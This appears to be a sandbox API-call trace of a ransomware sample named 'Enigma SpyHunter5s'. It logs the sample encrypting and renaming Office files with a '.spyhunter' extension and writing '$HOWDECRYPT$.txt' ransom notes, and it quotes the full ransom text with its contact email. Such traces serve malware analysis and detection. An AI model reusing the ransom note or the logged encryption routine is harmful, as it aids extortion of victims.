RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0104.174] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfb0c*=0x2800, lpOverlapped=0x0) returned 1 [0104.269] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.269] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfb0c*=0x2800, lpOverlapped=0x0) returned 1 [0104.269] GetProcessHeap () returned 0x2c0000 [0104.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0104.269] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.269] WriteFile (in: hFile=0x170, lpBuffer=0x25cfb4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb0c, lpOverlapped=0x0 | out: lpBuffer=0x25cfb4c*, lpNumberOfBytesWritten=0x25cfb0c*=0x4, lpOverlapped=0x0) returned 1 [0104.785] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb0c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb0c*=0x30, lpOverlapped=0x0) returned 1 [0104.786] CloseHandle (hObject=0x170) returned 1 [0104.786] GetProcessHeap () returned 0x2c0000 [0104.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cde318 [0104.786] wnsprintfW (in: pszDest=0x2cde318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\XMLSDK5.CHM.spyhunter") returned 73 [0104.786] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\XMLSDK5.CHM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xmlsdk5.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\XMLSDK5.CHM.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\xmlsdk5.chm.spyhunter")) returned 1 [0104.920] GetProcessHeap () returned 0x2c0000 [0104.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cde318 | out: hHeap=0x2c0000) returned 1 [0104.920] GetProcessHeap () returned 0x2c0000 [0104.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0104.920] GetProcessHeap () returned 0x2c0000 [0104.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9b020 | out: hHeap=0x2c0000) returned 1 [0104.922] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb50 | out: pbBuffer=0x25cfb50) returned 1 [0104.923] GetProcessHeap () returned 0x2c0000 [0104.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0104.923] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb48*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb48*=0x30) returned 1 [0104.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\contab32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0105.322] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 59 [0105.323] StrStrW (lpFirst="CONTAB32.DLL", lpSrch=".txt") returned 0x0 [0105.323] GetProcessHeap () returned 0x2c0000 [0105.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0105.323] ReadFile (in: hFile=0xf0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfb0c*=0x2800, lpOverlapped=0x0) returned 1 [0105.558] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.558] WriteFile (in: hFile=0xf0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfb0c*=0x2800, lpOverlapped=0x0) returned 1 [0105.559] GetProcessHeap () returned 0x2c0000 [0105.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0105.559] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.559] WriteFile (in: hFile=0xf0, lpBuffer=0x25cfb4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb0c, lpOverlapped=0x0 | out: lpBuffer=0x25cfb4c*, lpNumberOfBytesWritten=0x25cfb0c*=0x4, lpOverlapped=0x0) returned 1 [0105.576] WriteFile (in: hFile=0xf0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb0c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb0c*=0x30, lpOverlapped=0x0) returned 1 [0105.576] CloseHandle (hObject=0xf0) returned 1 [0105.576] GetProcessHeap () returned 0x2c0000 [0105.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0105.576] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL.spyhunter") returned 69 [0105.576] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\contab32.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\contab32.dll.spyhunter")) returned 1 [0105.608] GetProcessHeap () returned 0x2c0000 [0105.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0105.608] GetProcessHeap () returned 0x2c0000 [0105.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0105.608] GetProcessHeap () returned 0x2c0000 [0105.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34e258 | out: hHeap=0x2c0000) returned 1 [0105.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb48 | out: pbBuffer=0x25cfb48) returned 1 [0105.608] GetProcessHeap () returned 0x2c0000 [0105.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0105.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb40*=0x30) returned 1 [0105.608] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0105.610] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest") returned 65 [0105.610] StrStrW (lpFirst="Graph.exe.manifest", lpSrch=".txt") returned 0x0 [0105.610] GetProcessHeap () returned 0x2c0000 [0105.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0105.610] ReadFile (in: hFile=0xf0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb04, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfb04*=0x3c0, lpOverlapped=0x0) returned 1 [0105.634] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffc40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.634] WriteFile (in: hFile=0xf0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x25cfb04, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfb04*=0x3c0, lpOverlapped=0x0) returned 1 [0105.634] GetProcessHeap () returned 0x2c0000 [0105.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0105.634] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.635] WriteFile (in: hFile=0xf0, lpBuffer=0x25cfb44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb04, lpOverlapped=0x0 | out: lpBuffer=0x25cfb44*, lpNumberOfBytesWritten=0x25cfb04*=0x4, lpOverlapped=0x0) returned 1 [0105.635] WriteFile (in: hFile=0xf0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb04, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb04*=0x30, lpOverlapped=0x0) returned 1 [0105.635] CloseHandle (hObject=0xf0) returned 1 [0105.648] GetProcessHeap () returned 0x2c0000 [0105.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cd57e8 [0105.649] wnsprintfW (in: pszDest=0x2cd57e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest.spyhunter") returned 75 [0105.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe.manifest"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Graph.exe.manifest.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\graph.exe.manifest.spyhunter")) returned 1 [0105.649] GetProcessHeap () returned 0x2c0000 [0105.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cd57e8 | out: hHeap=0x2c0000) returned 1 [0105.649] GetProcessHeap () returned 0x2c0000 [0105.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0105.649] GetProcessHeap () returned 0x2c0000 [0105.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cadea8 | out: hHeap=0x2c0000) returned 1 [0105.650] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb48 | out: pbBuffer=0x25cfb48) returned 1 [0105.650] GetProcessHeap () returned 0x2c0000 [0105.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0105.650] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb40*=0x30) returned 1 [0105.650] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkpowerpoint.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0105.664] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll") returned 63 [0105.664] StrStrW (lpFirst="GKPowerPoint.dll", lpSrch=".txt") returned 0x0 [0105.664] GetProcessHeap () returned 0x2c0000 [0105.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0105.664] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfb04*=0x2800, lpOverlapped=0x0) returned 1 [0105.776] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.776] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfb04*=0x2800, lpOverlapped=0x0) returned 1 [0105.776] GetProcessHeap () returned 0x2c0000 [0105.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0105.777] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.777] WriteFile (in: hFile=0x170, lpBuffer=0x25cfb44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb04, lpOverlapped=0x0 | out: lpBuffer=0x25cfb44*, lpNumberOfBytesWritten=0x25cfb04*=0x4, lpOverlapped=0x0) returned 1 [0105.908] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb04, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb04*=0x30, lpOverlapped=0x0) returned 1 [0105.908] CloseHandle (hObject=0x170) returned 1 [0105.909] GetProcessHeap () returned 0x2c0000 [0105.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0105.909] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll.spyhunter") returned 73 [0105.909] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll" (normalized: "c:\\program files\\microsoft office\\office14\\gkpowerpoint.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\GKPowerPoint.dll.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\gkpowerpoint.dll.spyhunter")) returned 1 [0105.909] GetProcessHeap () returned 0x2c0000 [0105.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0105.909] GetProcessHeap () returned 0x2c0000 [0105.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0105.909] GetProcessHeap () returned 0x2c0000 [0105.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9bef8 | out: hHeap=0x2c0000) returned 1 [0105.910] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0106.073] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0106.073] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfa77*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfba0, lpOverlapped=0x0 | out: lpBuffer=0x25cfa77*, lpNumberOfBytesWritten=0x25cfba0*=0x127, lpOverlapped=0x0) returned 1 [0106.112] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0106.112] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfba0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfba0*=0x2ac, lpOverlapped=0x0) returned 1 [0106.113] CloseHandle (hObject=0xb4) returned 1 [0106.113] GetProcessHeap () returned 0x2c0000 [0106.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b8488 | out: hHeap=0x2c0000) returned 1 [0106.113] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0106.114] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0106.114] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfa73*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfb9c, lpOverlapped=0x0 | out: lpBuffer=0x25cfa73*, lpNumberOfBytesWritten=0x25cfb9c*=0x127, lpOverlapped=0x0) returned 1 [0106.115] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0106.115] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfb9c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfb9c*=0x2ac, lpOverlapped=0x0) returned 1 [0106.115] CloseHandle (hObject=0xb4) returned 1 [0106.115] GetProcessHeap () returned 0x2c0000 [0106.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c263f0 | out: hHeap=0x2c0000) returned 1 [0106.116] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb38 | out: pbBuffer=0x25cfb38) returned 1 [0106.116] GetProcessHeap () returned 0x2c0000 [0106.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0106.116] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfb30*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfb30*=0x30) returned 1 [0106.116] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\Whistling.wav" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\whistling.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0106.117] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\Whistling.wav") returned 81 [0106.117] StrStrW (lpFirst="Whistling.wav", lpSrch=".txt") returned 0x0 [0106.117] GetProcessHeap () returned 0x2c0000 [0106.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0106.117] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfaf4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfaf4*=0x2800, lpOverlapped=0x0) returned 1 [0106.122] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.122] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfaf4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfaf4*=0x2800, lpOverlapped=0x0) returned 1 [0106.122] GetProcessHeap () returned 0x2c0000 [0106.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0106.123] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.123] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfb34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfaf4, lpOverlapped=0x0 | out: lpBuffer=0x25cfb34*, lpNumberOfBytesWritten=0x25cfaf4*=0x4, lpOverlapped=0x0) returned 1 [0106.580] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfaf4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfaf4*=0x30, lpOverlapped=0x0) returned 1 [0106.580] CloseHandle (hObject=0xb4) returned 1 [0106.580] GetProcessHeap () returned 0x2c0000 [0106.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0106.581] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\Whistling.wav.spyhunter") returned 91 [0106.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\Whistling.wav" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\whistling.wav"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\Whistling.wav.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\whistling.wav.spyhunter")) returned 1 [0106.581] GetProcessHeap () returned 0x2c0000 [0106.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0106.581] GetProcessHeap () returned 0x2c0000 [0106.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0106.581] GetProcessHeap () returned 0x2c0000 [0106.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c985d0 | out: hHeap=0x2c0000) returned 1 [0106.582] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb38 | out: pbBuffer=0x25cfb38) returned 1 [0106.582] GetProcessHeap () returned 0x2c0000 [0106.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0106.582] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfb30*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfb30*=0x30) returned 1 [0106.582] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\TOOT.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\toot.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0106.613] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\TOOT.WAV") returned 76 [0106.613] StrStrW (lpFirst="TOOT.WAV", lpSrch=".txt") returned 0x0 [0106.613] GetProcessHeap () returned 0x2c0000 [0106.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0106.613] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfaf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfaf4*=0x2800, lpOverlapped=0x0) returned 1 [0106.623] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.623] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfaf4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfaf4*=0x2800, lpOverlapped=0x0) returned 1 [0106.623] 